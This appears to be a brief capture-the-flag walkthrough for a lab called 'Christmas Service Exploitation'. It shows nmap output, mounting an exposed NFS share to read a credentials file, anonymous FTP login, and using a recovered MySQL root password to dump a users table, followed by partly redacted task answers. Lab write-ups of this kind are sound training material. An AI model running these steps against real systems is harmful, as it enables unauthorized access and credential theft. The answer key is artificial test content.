Christmas Service Exploitation

nmap
21 ftp
22 ssh
111
2049 nfs
3306 mysql

enumerate nfs share
showmount -e <ip>
/opt/files

now we can create a directory and mount that share
ie, mount <ip>:/opt/files mount-dir
---[redacted]> creds.txt

ftp has got anonymous login
ftp <ip>
username:anonymous
no password required
get file.txt

mysql root password in file.txt

mysql -h <ip> --user root --password
show databases;
use data;
show tables;
select * from USERS;
---[redacted]> admin : [redacted]
''''

# TASK

1. What is the password inside the creds.txt file?

[redacted] ‘’

• What is the name of the file running on port 21?

  file.txt
  

• What is the password after enumerating the database?

  [redacted sensitive answer]